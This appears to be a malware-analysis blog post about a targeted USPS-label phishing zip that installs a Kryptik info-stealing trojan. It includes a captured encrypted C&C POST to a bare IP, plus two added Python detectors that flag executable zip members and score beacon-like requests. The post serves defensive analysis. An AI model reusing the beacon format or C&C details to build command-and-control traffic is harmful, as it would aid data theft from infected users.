Screenshot of original email
What makes this malware interesting is that it is clearly targeted: the sender knows the city of the email recipient. In this case, the attachment was named USPS_Label_Hagerstown.zip.
Analysis of the email headers shows that the email originated from mail16.chariot.com.au (the originating hop is read from the Received headers; only the Received lines added by your own mail servers can be trusted, since earlier ones can be forged by the sender). Checking this server, it is not an open relay, so it is possible that the mail server itself, or a system within the mail server's local network, was compromised.
Analysis of email headers
Inside the zip file is another file named USPS_Label_Hagerstown.exe, carrying the icon of a Microsoft Word document so that it passes for a label document rather than an executable.
VirusTotal shows a very low detection rate, and some of the detections are only heuristic.
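The lure above (a zip whose only payload is an executable dressed up as a document) is exactly what a mail-gateway or triage script should catch before a user double-clicks it. The following is an added example, not code from the original post: it opens a zip attachment and flags members that are executables, judging by content (the MZ header) rather than trusting the extension or the icon. The zip is constructed in memory with a fake MZ stub, not the real sample.

```python
import io
import os
import zipfile

# Extensions Windows will run on double-click (assumption: a reasonable list,
# not exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}


def build_sample_zip() -> bytes:
    """Constructed sample mimicking the lure: a shipping-label .exe plus a
    harmless text file. The .exe content is a fake MZ stub, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("USPS_Label_Hagerstown.exe", b"MZ" + b"\x90" * 62 + b"PE\x00\x00")
        zf.writestr("readme.txt", b"Just text.")
    return buf.getvalue()


def inspect_zip(data: bytes) -> list[dict]:
    """Return one finding per zip member that looks executable.

    Each finding lists the reasons: a runnable extension, a Windows 'MZ'
    header, a double extension (label.doc.exe), or executable bytes hiding
    behind a non-executable extension.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            base = os.path.basename(name)
            ext = os.path.splitext(base)[1].lower()
            with zf.open(info) as member:
                head = member.read(2)  # only the magic bytes are needed
            is_pe = head == b"MZ"
            reasons = []
            if ext in EXECUTABLE_EXTS:
                reasons.append(f"executable extension {ext}")
            if is_pe:
                reasons.append("MZ header (Windows executable)")
            if ext in EXECUTABLE_EXTS and base.count(".") > 1:
                reasons.append("double extension")
            if is_pe and ext not in EXECUTABLE_EXTS:
                reasons.append("executable content behind non-executable extension")
            if reasons:
                findings.append({"name": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in inspect_zip(build_sample_zip()):
        print(f["name"], "->", ", ".join(f["reasons"]))
```

Checking the magic bytes matters because the extension and icon are the parts the attacker controls; a renamed executable or a zip member with a spoofed extension still starts with MZ.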
The file itself installs a trojan on the user's system. This trojan produces some interesting results when analyzed in a sandbox.
In short, the trojan looks at your web browsing history, then begins sending encrypted HTTP POST requests to a command & control server.
The C&C server itself appears to be a compromised web host, most likely unknown to the server's owner. One of the captured requests:

POST /460326245047F2B6E405E92260B09AA0E35D7CA2B1 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Host: 88.255.149.11
Content-Length: 308
Cache-Control: no-cache

\x80\x00\x00\x00Sy\xb2\xeat\xe0/\xd8\xfa6k:K\xf1\x9f\xaa&x\xaa\xd3\x7f\xaer\x96C\xf2N\xf0\xf6\xf7\x94\xd2T\xa7\xcd\xc7\xe13n\x92p}\x83\x04\x01\x00j\xee+\xef\x036\x1a\x90t\x87\xabO\xd6\x81N4 \x85>\xfcD\xddob\x90\x8f\x00\xe6\x1c\xde\xf55\xf0\xc3\x8e3 |\x88\xf0\xb9\x0f\x95m@$\x14\xe0\x84\xd80\xe1[\x1c\xf1\xd7\xa6\xdb\x9c\x19\x00w!\xb2\x11\x9cz\x8eh(\xf7\x939\x18\xdb\x83\xcb\xfe\x14Rm\x83\xac\x00\x00\x00\xa3"\xfa\xecO*\xd8\x93\xdf\x9b%w\xef\xc5\xd4\xa9{\x92\xfd\xfa\x13\x0c\x95\xe4\xc2k\x9a\xb6a\x99\x94\xae\x02VjJA\xb1\xebf\xf5f\x83\xd7\xb5bs\xa1?%\x12\x15\xd4 i\xbcMp\xf3 =\xfaT\xff\xd0a'\x9a\xbb\x07\x91\xb4\xffb\x1f>hR\x9d\x84Q\xe3\xa1~\xb5\xcd\xea$\xc9\xa0\xd1\\xd1,!\xc0\x97|$Qg\xfe\xa1E,\xfe@\xba\x97\x01\x98\xb9\xdd\xea\xbd\xf7;\x94\x87T3\x90\xc5juG\xc3\x93\xc8\x98\x19\xf7\xff@\xce\x11\x1f\x82\x96\xff\xa5\xc1\xfdW9"R\xce\x81t\x0e\xf7o\x96_\x92>\x0c\xf3Dp\xc5\xc7c \xb4r\xaa\2\xba)
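The request above has several properties that a proxy log or IDS rule can key on without any knowledge of the malware family: the Host header is a bare IP address, the path is a single long hex token, the Content-Type claims a web form but the body is opaque binary, and the body's entropy is far above anything a real form post produces. The following is an added example (not from the original post) that parses a raw POST and scores those indicators. The request line and headers are the captured ones; the body is constructed here from SHA-256 output so that the example runs offline with deterministic high-entropy bytes, and is not the real ciphertext.

```python
import hashlib
import math
import re
from collections import Counter

# Request line and headers as captured in the post above.
CAPTURED_HEAD = (
    b"POST /460326245047F2B6E405E92260B09AA0E35D7CA2B1 HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\r\n"
    b"Host: 88.255.149.11\r\n"
    b"Content-Length: 308\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
# Constructed body: 308 deterministic pseudo-random bytes standing in for the
# encrypted payload (not the real bytes from the capture).
CONSTRUCTED_BODY = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(10))[:308]
CAPTURED_REQUEST = CAPTURED_HEAD + CONSTRUCTED_BODY

# Constructed benign login POST for comparison.
BENIGN_REQUEST = (
    b"POST /account/login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 31\r\n"
    b"\r\n"
    b"username=alice&password=hunter2"
)

# What a genuine application/x-www-form-urlencoded body looks like: key=value
# pairs joined by '&', all printable ASCII.
FORM_BODY = re.compile(rb"[A-Za-z0-9_.~%+*-]+=[^&]*(&[A-Za-z0-9_.~%+*-]+=[^&]*)*")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; ~8 for ciphertext/random data, ~4 for ASCII text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def beacon_indicators(raw: bytes) -> dict:
    """Evaluate each heuristic independently so an analyst can see which fired."""
    _method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    host = headers.get("host", "")
    looks_like_form = body.isascii() and FORM_BODY.fullmatch(body) is not None
    declared_len = int(headers.get("content-length", "0") or 0)
    return {
        "host_is_bare_ip": re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", host) is not None,
        "path_is_hex_token": re.fullmatch(r"/[0-9A-Fa-f]{32,}", path) is not None,
        "form_ctype_but_binary_body": "x-www-form-urlencoded" in ctype and not looks_like_form,
        "high_entropy_body": shannon_entropy(body) > 6.0,  # threshold is an assumption
        "length_mismatch": declared_len != len(body),
    }


def is_suspected_beacon(raw: bytes, threshold: int = 3) -> bool:
    """Flag when at least `threshold` indicators fire (threshold is an assumption)."""
    return sum(beacon_indicators(raw).values()) >= threshold


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, beacon_indicators(req), "->", is_suspected_beacon(req))
```

Scoring several weak signals rather than matching the exact path or IP is deliberate: the hex token and the C&C host change between samples, while the mismatch between the declared form encoding and an encrypted body is a property of the protocol itself.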
According to ESET, the malware is a variant of the Kryptik family, which steals information and sensitive files from a system. This variant, Win32/Kryptik.CBJZ, has only been seen in the wild since 05/8/2014, and has an extremely low infection rate.
For those interested, I have posted a decompiled and disassembled version of the malware at my malware analysis lab.
Many thanks to David Malekar for sending me a sample of this malware to analyze.
If anyone has additional malware samples similar to this one, with a targeted location in the filename, please feel free to contact me at CaffSecBlog AT gmail.com, and I'll be happy to take a look at it.